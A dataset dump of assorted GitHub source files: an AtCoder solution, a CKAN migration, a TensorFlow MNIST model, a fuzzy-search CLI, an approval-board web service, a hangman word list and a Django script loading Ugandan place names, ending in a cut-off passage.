{"seq_id":"5114881260","text":"n = int(input())\nmod = 998244353\n\ndef sum1(f):\n    f%=mod\n    # integer division keeps the arithmetic exact; f*(1+f) is always even,\n    # whereas float division would lose precision for large f\n    ans = (1+f)*f//2\n    ans %= mod\n    return ans\n\ndef digitf(d):\n    ans = pow(10,d) - pow(10,d-1)\n    return ans\n\ntemp = n\ndigit = 0\nwhile(temp!=0):\n    temp//=10\n    digit +=1\nans = 0\n\nfor i in range(1, digit):\n    f = digitf(i)\n    ans += sum1(f)\n    ans %= mod\nff = n-pow(10, digit-1)+1\nans += sum1(ff)\nans %= mod\nprint(ans)\n","repo_name":"ayaki-sugawara/atcoder","sub_path":"abc238/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"2292675832","text":"# -*- coding: utf-8 -*-\n\n\"\"\"create y table\n\nRevision ID: 728663ebe30e\nRevises: 4f59069f433e\nCreate Date: 2021-06-07 16:36:54.388978\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = u'728663ebe30e'\ndown_revision = u'4f59069f433e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.create_table(\n        u'example_database_migrations_y',\n        sa.Column(u'yid', sa.Integer, primary_key=True)\n    )\n\n\ndef downgrade():\n    op.drop_table(u'example_database_migrations_y')\n","repo_name":"ckan/ckan","sub_path":"ckanext/example_database_migrations/migration/example_database_migrations/versions/728663ebe30e_create_y_table.py","file_name":"728663ebe30e_create_y_table.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":4093,"dataset":"github-code","pt":"83"}
{"seq_id":"73994649872","text":"import tensorflow as tf\n\n# network hyper-parameters\nINPUT_NODE = 784\nOUTPUT_NODE = 10\nLAYER_1_NODE = 500\n\n\ndef get_weights(shape, regularizer):\n    weights = tf.get_variable(name='weights', shape=shape,\n                              initializer=tf.truncated_normal_initializer(stddev=0.1))\n    # add the variable's regularisation loss to the loss collection\n    if regularizer is not None:\n        tf.add_to_collection('loss', regularizer(weights))\n    return weights\n\n\ndef inference(input_tensor, regularizer):\n    with tf.variable_scope('layer_1'):\n        weights = get_weights(shape=[INPUT_NODE, LAYER_1_NODE], regularizer=regularizer)\n        biases = tf.get_variable(name='biases', shape=[LAYER_1_NODE],\n                                 initializer=tf.constant_initializer(0.0))\n        layer_1 =
 tf.nn.relu(tf.matmul(input_tensor, weights) + biases)\n\n    with tf.variable_scope('layer_2'):\n        weights = get_weights(shape=[LAYER_1_NODE, OUTPUT_NODE], regularizer=regularizer)\n        biases = tf.get_variable(name='biases', shape=[OUTPUT_NODE],\n                                 initializer=tf.constant_initializer(0.0))\n        return tf.matmul(layer_1, weights) + biases\n","repo_name":"gbzhu/tensorFlow_train","sub_path":"MNIST_better_demo/mnist_inference.py","file_name":"mnist_inference.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"43285061194","text":"\"\"\"Main module of the program.\n\nImports:\n    from typing import ... - for type annotations\n    from multiprocessing import ... - for multiprocessing\n    from argparse import ... - for the CLI\n    from colorama import ... - for coloured result output\n    from bktree import ... - for finding candidate matches\n    from bohr import ... - for finding substrings in a string\n\nFunctions:\n    fuzzy_search - fuzzy search for substrings in a string\n    constriction - narrow down the positions dictionary\n    print_colored - print the coloured result\n    main - entry point\n\n\"\"\"\nfrom typing import Optional\nfrom multiprocessing import Process, Manager\n\nfrom argparse import ArgumentParser\nfrom colorama import init, Back, Fore, Style\n\nfrom bktree import BKTree, levenshtein_distance\nfrom bohr import Bohr\n\n\ndef fuzzy_search(string: str, substrings: list[str], case_sensitive: bool,\n                 method: str, count: Optional[int], threshold: int,\n                 n_process: Optional[int]) -> dict[str, Optional[tuple[int]]]:\n    \"\"\"Fuzzy search for substrings in a string.\n\n    Args:\n        string: str - the string to search in\n        substrings: list[str] - the original substrings to search for\n        case_sensitive: bool - case sensitivity\n        method: str - search method\n            (\"first\" - forward / \"last\" - backward)\n        count: Optional[int] - number of first occurrences\n        threshold: int - error threshold\n        n_process: Optional[int] - number of processes\n\n    Returns a dictionary with the substring positions.\n\n    \"\"\"\n    if count == 0 or n_process == 0:\n        return {}\n    if not case_sensitive:\n        string = string.lower()\n\n    scatter = set()\n    length = len(string)\n    for substring in substrings:\n        size = len(substring)\n        lower = size - threshold\n        upper = size + threshold\n        scatter |= set(range(lower if lower > 1 else 1,\n                             (upper if upper < length else length) + 1))\n\n    bktree = BKTree(levenshtein_distance)\n\n    for i in range(length):\n        dop = scatter.copy()\n        for j in scatter:\n            if i + j <= length:\n                bktree.insert(string[i:i + j])\n            else:\n                dop.remove(j)\n        scatter = dop\n\n    fuzzy_substrings = set()\n    for substring in substrings:\n        fuzzy_substrings |= {substring} \\\n            | bktree.search(substring, threshold, n_process)\n\n    bohr = Bohr(case_sensitive, method, count)\n\n    max_len = 1\n    for substring in fuzzy_substrings:\n        bohr.add_pattern(substring)\n        size = len(substring)\n        if size > max_len:\n            max_len = size\n\n    manager = Manager()\n    mdict = manager.dict()\n    lock = manager.RLock()\n\n    chunk_size = length // (n_process if n_process else 1) + 1\n    chunks = [(string[i:i + chunk_size + max_len - 1], i)\n              for i in range(0, length, chunk_size)]\n    processes = tuple()\n\n    search = bohr.search\n    for chunk in chunks:\n        process = Process(target=search, args=(*chunk, mdict, lock))\n        process.start()\n        processes += (process,)\n\n    for process in processes:\n        process.join()\n\n    result = constriction(mdict, count, method)\n    items = result.items()\n    for key, item in
 items:\n        if item:\n            result[key] = tuple(sorted(item))\n    return result\n\n\ndef constriction(mdict: dict[str, set[int]], count: Optional[int],\n                 method: str) -> dict[str, Optional[set[int]]]:\n    \"\"\"Narrow down the dictionary of substring positions.\n\n    Args:\n        mdict: dict[str, set[int]] - the dictionary to process\n        count: Optional[int] - number of first occurrences\n        method: str - search method\n            (\"first\" - forward / \"last\" - backward)\n\n    Returns the processed positions dictionary.\n\n    \"\"\"\n    if not count:\n        return mdict\n\n    indexes = set()\n    items = mdict.items()\n    for key, index in items:\n        if index:\n            size = len(key)\n            indexes |= set(map(lambda x: x + size, index))\n\n    result, result_count = dict.fromkeys(mdict.keys()), 0\n    indexes = sorted(indexes, reverse=(False if method == \"first\" else True))\n\n    for index in indexes:\n        for key, item in items:\n            pos = index - len(key)\n            if item and pos in item:\n\n                if result[key]:\n                    result[key] |= {pos}\n                else:\n                    result[key] = {pos}\n\n                result_count += 1\n                if result_count == count:\n                    return result\n\n    return result\n\n\ndef print_colored(string: str, result: dict[str, Optional[tuple[int]]]):\n    \"\"\"Print the coloured search result.\n\n    Args:\n        string: str - the string that was searched\n        result: dict[str, Optional[tuple[int]]] - the result of searching\n            for substrings in string\n\n    Functions:\n        colors - create and return a tuple of colours\n\n    \"\"\"\n\n    def colors(ansi):\n        \"\"\"Create and return a tuple of colours for ansi.\"\"\"\n        return (ansi.BLUE, ansi.CYAN, ansi.GREEN, ansi.MAGENTA, ansi.RED,\n                ansi.YELLOW, ansi.LIGHTBLUE_EX, ansi.LIGHTCYAN_EX,\n                ansi.LIGHTGREEN_EX, ansi.LIGHTMAGENTA_EX, ansi.LIGHTRED_EX,\n                ansi.LIGHTYELLOW_EX)\n\n    b_colors = colors(Back)\n    f_colors = colors(Fore)\n\n    indices = {}\n    color = 0\n    color_result = result.copy()\n    for pattern in result:\n        if result[pattern] is not None:\n            size = len(pattern)\n            for i in result[pattern]:\n                indices |= dict.fromkeys(tuple(range(i, i + size)),\n                                         b_colors[color])\n            color_result[f_colors[color] + pattern\n                         + Style.RESET_ALL] = color_result.pop(pattern)\n            color = (color + 1) % 12\n        else:\n            color_result[pattern] = color_result.pop(pattern)\n\n    print()\n    count = 0\n    for i, char in enumerate(string):\n        if i in indices:\n            print(indices[i] + char, end=\"\")\n        else:\n            print(char, end=\"\")\n        if char == \"\\n\":\n            count += 1\n            if count == 10:\n                break\n\n    print_result = \"\\n{\"\n    for pattern in color_result:\n        print_result += \"'\" + pattern + \"': \" + str(color_result[pattern])\n        print_result += \", \"\n    print(print_result[:-2] + \"}\")\n\n\ndef main():\n    \"\"\"Main function of the program: the entry point.\n\n    Adds and parses the arguments, then runs the search\n    and prints the result.\n\n    \"\"\"\n    parser = ArgumentParser()\n    parser.add_argument(\"-s\", \"--string\", type=str, nargs=\"+\", required=True)\n    parser.add_argument(\"-f\", \"--file\", action=\"store_true\", default=False)\n    parser.add_argument(\"-rf\", \"--result-file\", type=str, default=None)\n    parser.add_argument(\"-ss\", \"--sub-string\", type=str,\n                        nargs=\"+\", required=True)\n    parser.add_argument(\"-cs\", \"--case-sensitive\",\n                        action=\"store_true\", default=False)\n    parser.add_argument(\"-m\", \"--method\",\n                        choices=(\"first\", \"last\"), default=\"first\")\n    parser.add_argument(\"-c\", \"--count\", type=int, default=None)\n    parser.add_argument(\"-t\", \"--threshold\", type=int, default=1)\n    parser.add_argument(\"-p\", \"--process\", type=int, default=None)\n\n    args = parser.parse_args()\n    strings = args.string\n    file_flag =
 args.file\n    result_file = args.result_file\n    substrings = args.sub_string\n    case_sensitive = args.case_sensitive\n    method = args.method\n    count = args.count\n    threshold = args.threshold\n    n_process = args.process\n\n    error = __file__.rsplit('\\\\', 1)[-1] + \": error: \"\n    if len(strings) > 10:\n        print(error + \"the number of strings cannot be more than 10\")\n        return\n    if file_flag:\n        if len(strings) > 1:\n            print(error + \"cannot specify the path to more than one file\")\n            return\n        try:\n            file = open(strings[0], \"r\", encoding=\"utf-8\")\n        except FileNotFoundError:\n            print(error + \"file not found\")\n            return\n        else:\n            # close the file here; a finally-clause would raise NameError\n            # when open() itself failed and `file` was never bound\n            strings = (\"\".join(file.readlines()),)\n            file.close()\n    if count and count < 0:\n        print(error + \"count cannot be negative\")\n        return\n    if threshold < 0:\n        print(error + \"threshold cannot be negative\")\n        return\n    if n_process and n_process < 0:\n        print(error + \"process cannot be negative\")\n        return\n\n    if result_file:\n        try:\n            rfile = open(result_file, \"w\", encoding=\"utf-8\")\n        except PermissionError:\n            print(error + \"unable to open result file\")\n            return\n\n    results = tuple()\n    for string in strings:\n        results += (fuzzy_search(string, substrings, case_sensitive,\n                                 method, count, threshold, n_process),)\n\n    init(autoreset=True)\n    for i, result in enumerate(results):\n        print_colored(strings[i], result)\n        if result_file:\n            rfile.write(str(result) + \"\\n\")\n\n    if result_file:\n        rfile.close()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"DefioOWol/structures","sub_path":"Lab-9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"72456962832","text":"import os\nimport shutil\nimport sys\nimport copy\nimport json\nimport re\nimport uuid\nimport io\nimport csv\nimport tempfile\nfrom collections import Counter\nfrom datetime import datetime\n\nfrom allscapeAPIMain import db\nfrom allscapeAPIMain import procCode\nfrom allscapeAPIMain import procName\nfrom allscapeAPIMain import spaceHome\nfrom allscapeAPIMain import approvalBoardFile\n\nfrom common import constants\nfrom common.excelService import excelService\nfrom common.logManage import logManage\nfrom projectApprovalBoardManage.sqlProjectApprovalBoardManage import (\n    sqlProjectApprovalBoardManage,\n)\nfrom logManage.servLogManage import servLogManage\nfrom projectProcessManage.servProjectProcessManage import servProjectProcessManage\nfrom projectProcessManage.sqlProjectProcessManage import sqlProjectProcessManage\n\nlogs = logManage()  # logger object for recording API logs\n\n\nclass servProjectApprovalBoardManage:\n    \"\"\"Approval board management service class\"\"\"\n\n    def post_approval(\n        self,\n        cons_code,\n        co_code,\n        writer_id,\n        post_type,\n        title,\n        content,\n        approvals,\n        files,\n    ):\n        \"\"\"Create an approval post\"\"\"\n\n        #### Upload the approval post ####\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        servProjProcMana = servProjectProcessManage()\n\n        queryList = list()\n        dataList = list()\n        post_uuid = str(uuid.uuid4()).replace(\"-\", \"\")  # generate a uuid for the approval post\n\n        #### Write the approval post ####\n        query = sqlProjectApprovalBoardManage.insert_approval(\n            cons_code,\n            post_uuid,\n            writer_id,\n            post_type,\n            # title,\n            # json.dumps(content, ensure_ascii=False),\n        )\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"insert_approval Query : \" + query,\n        )\n        queryList.append(query)\n        dataList.append([title, json.dumps(content, ensure_ascii=False)])\n        #### Add the drafter ####
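\n        # index 0 presumably orders the drafter ahead of the approval chain entries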
\n        query = sqlProjectApprovalBoardManage.insert_info(\n            cons_code, post_uuid, writer_id, constants.APPRO_TYPE_CD_DRAFTER, 0\n        )\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"insert_approval_info Query : \" + query,\n        )\n        queryList.append(query)\n        dataList.append([])\n        #### Add the other participants ####\n\n        if approvals:\n            logs.debug(\n                procName,\n                os.path.basename(__file__),\n                sys._getframe(0).f_code.co_name,\n                \"approvals : \" + str(approvals),\n            )\n            for _, approval in zip(range(1, len(approvals) + 1), approvals):\n                for approver in approval:\n                    query = sqlProjectApprovalBoardManage.insert_info(\n                        cons_code,\n                        post_uuid,\n                        approver[\"id\"],\n                        approver[\"apr_type\"],\n                        approver[\"index\"],\n                    )\n                    logs.debug(\n                        procName,\n                        os.path.basename(__file__),\n                        sys._getframe(0).f_code.co_name,\n                        \"insert_info Query : \" + query,\n                    )\n                    queryList.append(query)\n                    dataList.append([])\n\n        resCd, msg, _ = dbms.executeIterSpecial(queryList, dataList)\n\n        #### Create a directory from the post uuid\n        if resCd == 0:\n            if files:\n                file_path = \"\".join(\n                    [\n                        spaceHome,\n                        approvalBoardFile.replace(\"{post_uuid}\", post_uuid),\n                    ]\n                )\n                os.makedirs(file_path, exist_ok=True)\n\n                #### Save the uploaded files to the directory and the DB\n                file_dict = {\n                    \"f\": 0,\n                    \"q\": 1,\n                }  # f: misc, q: quotation\n                for key in files.keys():\n                    # only f_<n> and q_<n> keys are valid upload slots\n                    if not re.match(r\"[fq]_\\d+\", key):\n                        continue\n                    file_type = file_dict[key[0]]\n                    upload_file = files[key]\n                    #### Build the file metadata and save ####\n                    orig_name = upload_file.filename\n                    _, ext = os.path.splitext(orig_name)\n                    chan_name = str(uuid.uuid4()).replace(\"-\", \"\") + ext\n                    upload_file.save(file_path + chan_name)\n\n                    #### Register the file in the DB ####\n                    query = sqlProjectApprovalBoardManage.insert_approval_file(\n                        post_uuid,\n                        file_path,\n                        file_type,\n                        chan_name,\n                    )\n\n                    logs.debug(\n                        procName,\n                        os.path.basename(__file__),\n                        sys._getframe(0).f_code.co_name,\n                        \"insert_approval_file Query : \" + query,\n                    )\n\n                    resCd, msg, _ = dbms.executeSpecial(query, orig_name)\n\n                    #### Delete the file if DB registration failed ####\n                    if resCd != 0:\n                        os.remove(file_path + chan_name)\n\n        return resCd, msg, post_uuid\n\n    def get_approval_list(\n        self,\n        id,\n        cons_code,\n        co_code,\n        co_name,\n        writer_name,\n        post_type,\n        title_keyword,\n        content_keyword,\n        reg_date_start,\n        reg_date_end,\n    ):\n        \"\"\"Fetch the list of approval posts\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        servProcessMana = servProjectProcessManage()\n\n        query = sqlProjectApprovalBoardManage.select_approval_list(\n            id,\n            cons_code,\n            post_type,\n            reg_date_start,\n            reg_date_end,\n        )\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"select_approval_list Query : \" + query,\n        )\n\n        resCd, msg, approvalList = dbms.querySpecial(\n            query,\n            [\n                \"%Y%m%d\",\n                \"%Y%m%d\",\n                f\"%{co_name}%\",\n                f\"%{writer_name}%\",\n                f\"%{title_keyword}%\",\n                f\"%{content_keyword}%\",\n            ],\n        )\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"select_approval_list result : \" + str(resCd) + str(msg),\n        )\n        return resCd, msg, approvalList\n\n    def get_approval(self, id, cons_code, co_code, uuid):\n        \"\"\"Fetch an approval post\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        servProcessMana = servProjectProcessManage()\n\n        #### Mark the post as read ####\n        query = sqlProjectApprovalBoardManage.update_readdate(cons_code, uuid, id)\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_readdate Query : \" + query,\n        )\n        resCd, msg, approvalData = dbms.execute(query)\n\n        if resCd == 0:\n            query =
 sqlProjectApprovalBoardManage.select_approval(cons_code, uuid)\n\n            logs.debug(\n                procName,\n                os.path.basename(__file__),\n                sys._getframe(0).f_code.co_name,\n                \"select_approval Query : \" + query,\n            )\n\n            resCd, msg, approvalData = dbms.queryForObject(query)\n            try:\n                jsonData = json.loads(approvalData[\"content\"])\n                # merge the parsed content fields (reason, content, change_date, ...)\n                # into the row without discarding the DB columns such as \"uuid\"\n                approvalData.update(jsonData)\n            except (TypeError, ValueError):\n                pass\n\n            #### Attach the file information ####\n            if resCd == 0 and approvalData:\n                query = sqlProjectApprovalBoardManage.select_approval_file(\n                    approvalData[\"uuid\"]\n                )\n\n                logs.debug(\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"select_approval_file Query : \" + query,\n                )\n\n                resCd, msg, fileData = dbms.query(query)\n                if resCd == 0 and fileData:\n                    approvalData[\"files\"] = fileData\n\n            #### Attach the participant information ####\n            if resCd == 0:\n                query = sqlProjectApprovalBoardManage.select_info_list(\n                    cons_code, approvalData[\"uuid\"]\n                )\n\n                logs.debug(\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"select_info_list Query : \" + query,\n                )\n\n                resCd, msg, infoData = dbms.query(query)\n                if resCd == 0 and infoData:\n                    approvalData[\"info\"] = infoData\n\n        return resCd, msg, approvalData\n\n    def put_approval(\n        self, cons_code, post_uuid, post_type, title, content, approvals, deletes, files\n    ):\n        \"\"\"Update an approval post\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n\n        queryList = list()\n\n        #### Reset the approval post ####\n        query = sqlProjectApprovalBoardManage.update_approval_reset(\n            cons_code, post_uuid\n        )\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_approval_reset Query : \" + query,\n        )\n        queryList.append(query)\n\n        #### Reset the approval state ####\n        query = sqlProjectApprovalBoardManage.update_apr_reset(cons_code, post_uuid)\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_apr_reset Query : \" + query,\n        )\n        queryList.append(query)\n\n        resCd, msg, _ = dbms.executeIter(queryList)\n\n        #### Edits may proceed only if the reset succeeded ####\n        if resCd == 0:\n\n            #### Update the permissions ####\n            if approvals:\n                query = sqlProjectApprovalBoardManage.delete_info_all(cons_code, post_uuid)\n                logs.debug(\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"delete_info_all Query : \" + query,\n                )\n                queryList.append(query)\n                logs.debug(\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"approvals : \" + str(approvals),\n                )\n                for _, approval in zip(range(1, len(approvals) + 1), approvals):\n                    for approver in approval:\n                        query = sqlProjectApprovalBoardManage.insert_info(\n                            cons_code,\n                            post_uuid,\n                            approver[\"id\"],\n                            approver[\"apr_type\"],\n                            approver[\"index\"],\n                        )\n                        logs.debug(\n                            procName,\n                            os.path.basename(__file__),\n                            sys._getframe(0).f_code.co_name,\n                            \"insert_info Query : \" + query,\n                        )\n                        queryList.append(query)\n\n                resCd, msg, _ = dbms.executeIter(queryList)\n\n            #### Update the post body ####\n            if post_type or title or content:\n                query = sqlProjectApprovalBoardManage.update_approval(\n                    cons_code,\n                    post_uuid,\n                    post_type,\n                    # title,\n                    # json.dumps({k: v.replace('\\\"', \"'\") for k, v in content.items()}, ensure_ascii=False),\n                )\n\n                logs.debug(
\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"update_approval Query : \" + query,\n                )\n\n                resCd, msg, _ = dbms.executeSpecial(\n                    query, [title, json.dumps(content, ensure_ascii=False)]\n                )\n\n            #### Delete files ####\n            if deletes:\n                delete_index = f\"{','.join(str(num) for num in deletes)}\"\n                query = sqlProjectApprovalBoardManage.delete_approval_file(\n                    post_uuid, delete_index\n                )\n                logs.debug(\n                    procName,\n                    os.path.basename(__file__),\n                    sys._getframe(0).f_code.co_name,\n                    \"delete_approval_file Query : \" + query,\n                )\n                resCd, msg, _ = dbms.execute(query)\n\n            #### Add files ####\n            #### Create a directory from the post uuid ####\n            if files:\n                file_path = \"\".join(\n                    [\n                        spaceHome,\n                        approvalBoardFile.replace(\"{post_uuid}\", post_uuid),\n                    ]\n                )\n                os.makedirs(file_path, exist_ok=True)\n\n                #### Save the uploaded files to the directory and the DB\n                file_dict = {\n                    \"f\": 0,\n                    \"q\": 1,\n                }  # f: misc, q: quotation\n                for key in files.keys():\n                    # only f_<n> and q_<n> keys are valid upload slots\n                    if not re.match(r\"[fq]_\\d+\", key):\n                        continue\n                    file_type = file_dict[key[0]]\n                    file = files[key]\n\n                    #### Build the file metadata and save ####\n                    orig_name = file.filename\n                    _, ext = os.path.splitext(orig_name)\n                    chan_name = str(uuid.uuid4()).replace(\"-\", \"\") + ext\n                    file.save(file_path + chan_name)\n\n                    #### Register the file in the DB ####\n                    query = sqlProjectApprovalBoardManage.insert_approval_file(\n                        post_uuid,\n                        file_path,\n                        file_type,\n                        chan_name,\n                    )\n\n                    logs.debug(\n                        procName,\n                        os.path.basename(__file__),\n                        sys._getframe(0).f_code.co_name,\n                        \"insert_approval_file Query : \" + query,\n                    )\n\n                    resCd, msg, _ = dbms.executeSpecial(query, orig_name)\n\n                    #### Delete the file if DB registration failed ####\n                    if resCd != 0:\n                        os.remove(file_path + chan_name)\n\n        return resCd, msg, None\n\n    def delete_approval(self, cons_code, uuid):\n        \"\"\"Delete an approval post\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.delete_approval(cons_code, uuid)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"delete_approval Query : \" + query,\n        )\n\n        resCd, msg, _ = dbms.execute(query)\n\n        #### Delete all related attachments ####\n        \"\"\"\n        if resCd == 0:\n            file_path = \"\".join(\n                [spaceHome, approvalBoardFile.replace(\"{post_uuid}\", uuid)]\n            )\n            shutil.rmtree(file_path, ignore_errors=True)\n        \"\"\"\n        return resCd, msg, None\n\n    def withdraw(self, cons_code, uuid):\n        \"\"\"Withdraw an approval post\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.withdraw(cons_code, uuid)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"withdraw_approval Query : \" + query,\n        )\n\n        resCd, msg, _ = dbms.execute(query)\n\n        #### Delete all related attachments ####\n        \"\"\"\n        if resCd == 0:\n            file_path = \"\".join(\n                [spaceHome, approvalBoardFile.replace(\"{post_uuid}\", uuid)]\n            )\n            shutil.rmtree(file_path, ignore_errors=True)\n        \"\"\"\n        return resCd, msg, None\n\n    def post_reply(self, post_uuid, parent_uuid, writer_id, content):\n        \"\"\"Create a comment\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.insert_reply(\n            post_uuid, parent_uuid, writer_id, content\n        )\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"insert_reply Query : \" + query,\n        )\n\n        return dbms.executeMulti(query)\n\n    def get_reply(self, post_uuid, parent_uuid) -> dict:\n        \"\"\"Fetch comments\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.select_reply(post_uuid, parent_uuid)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),
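\n            # sys._getframe(0).f_code.co_name resolves to the name of the enclosing method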
\n            sys._getframe(0).f_code.co_name,\n            \"select_reply Query : \" + query,\n        )\n\n        return dbms.query(query)\n\n    def put_reply(self, post_uuid, uuid, content) -> dict:\n        \"\"\"Update a comment\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.update_reply(post_uuid, uuid, content)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_reply Query : \" + query,\n        )\n\n        return dbms.execute(query)\n\n    def del_reply(self, post_uuid, uuid) -> dict:\n        \"\"\"Delete a comment\"\"\"\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.delete_reply(post_uuid, uuid)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"delete_reply Query : \" + query,\n        )\n\n        return dbms.execute(query)\n\n    def draft(self, cons_code, post_uuid, id) -> dict:\n        \"\"\"Draft an approval\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.update_drafted(cons_code, post_uuid, id)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_drafted Query : \" + query,\n        )\n\n        return dbms.execute(query)\n\n    def approve(self, cons_code, post_uuid, id, co_code, remarks) -> dict:\n        \"\"\"Approve a request\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.update_approved(cons_code, post_uuid, id)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_approve Query : \" + query,\n        )\n\n        return dbms.executeSpecial(query, [remarks])\n\n    def deny(self, cons_code, post_uuid, id, remarks) -> dict:\n        \"\"\"Reject a request\"\"\"\n\n        dbms = copy.copy(db)  # copy the object so DB attributes are not shared\n        query = sqlProjectApprovalBoardManage.update_denied(cons_code, post_uuid, id)\n\n        logs.debug(\n            procName,\n            os.path.basename(__file__),\n            sys._getframe(0).f_code.co_name,\n            \"update_denied Query : \" + query,\n        )\n\n        return dbms.executeSpecial(query, [remarks])\n","repo_name":"oscar351/ApiManage","sub_path":"projectApprovalBoardManage/servProjectApprovalBoardManage.py","file_name":"servProjectApprovalBoardManage.py","file_ext":"py","file_size_in_byte":20900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"74989730510","text":"#!
/usr/bin/python3.4\n# -*-coding:utf-8 -*\n\n\"\"\"List of all variables for our Pendu game\"\"\"\n\n# We will pick word from this list\nlistWord = [\n \"kiwix\",\n \"python\",\n \"openclassrooms\",\n \"coursera\",\n \"stallman\",\n \"wikipedia\",\n \"kisangani\",\n \"programme\",\n \"radio\",\n \"telephone\",\n \"cisco\",\n \"paris\"\n ]\n\nuserScore, maxChoice, scoreFile = 0, 8, \"scores\"\n","repo_name":"Bam92/python-4-everybody","sub_path":"guess/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18792137761","text":"#!/usr/bin/python3\r\n\r\nimport os\r\nimport django\r\nimport sys\r\n\r\n# Add the project root directory to the Python path\r\nproject_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\r\nsys.path.append(project_root)\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tutorial.settings\")\r\ndjango.setup()\r\n\r\nfrom newborn.models import District, Subcounty, Parish, Village, CountyMunicipality\r\n\r\ndef populate_database():\r\n # Create District - Kiruhura\r\n district, _ = District.objects.get_or_create(name='Kiruhura')\r\n\r\n # Create County/Municipality - Nyabushozi\r\n county_municipality, _ = CountyMunicipality.objects.get_or_create(district=district, name='Nyabushozi')\r\n\r\n # Create Subcounty - Kenshunga\r\n subcounty, _ = Subcounty.objects.get_or_create(county_municipality=county_municipality, name='Kenshunga')\r\n\r\n # Create Parishes and Villages for each parish\r\n\r\n parishes_and_villages = [\r\n ('Rushere town board', ['Hospital zone', 'Central zone', 'Market zone', 'Police zone']),\r\n ('Rushere', ['Akakoma', 'Akatongore', 'Akatongore 1', 'Burimbi', 'Kyabagyenyi i', 'Komugina', 'Ekishunju', 'Nshwere empango']),\r\n ('Rugongi', ['Buharambo', 'Buzooba', 'Kibingo', 'Kayanga', 'Rwomuti i', 'Rwomuti ii', 'Kakira', 'Kyeitagi', 'Mirama', 'Mitooma', 'Mitooma central', 'Magyegye', 'Migamba', 'Muzaire']),\r\n ('Nyakasharara', ['Butembererwa', 'Katete i', 'Katete ii', 'Kanyabihara', 'Mwaka i', 'Rwabigyemano']),\r\n ('Nshwerenkye', ['Kyabagyenyi ii', 'Rwengwe', 'Nyanga', 'Rwakitura', 'Mugore', 'Nshwere ii']),\r\n ]\r\n\r\n for parish_name, village_names in parishes_and_villages:\r\n parish, _ = Parish.objects.get_or_create(subcounty=subcounty, name=parish_name)\r\n for village_name in village_names:\r\n village, _ = Village.objects.get_or_create(parish=parish, name=village_name)\r\n\r\nif __name__ == '__main__':\r\n 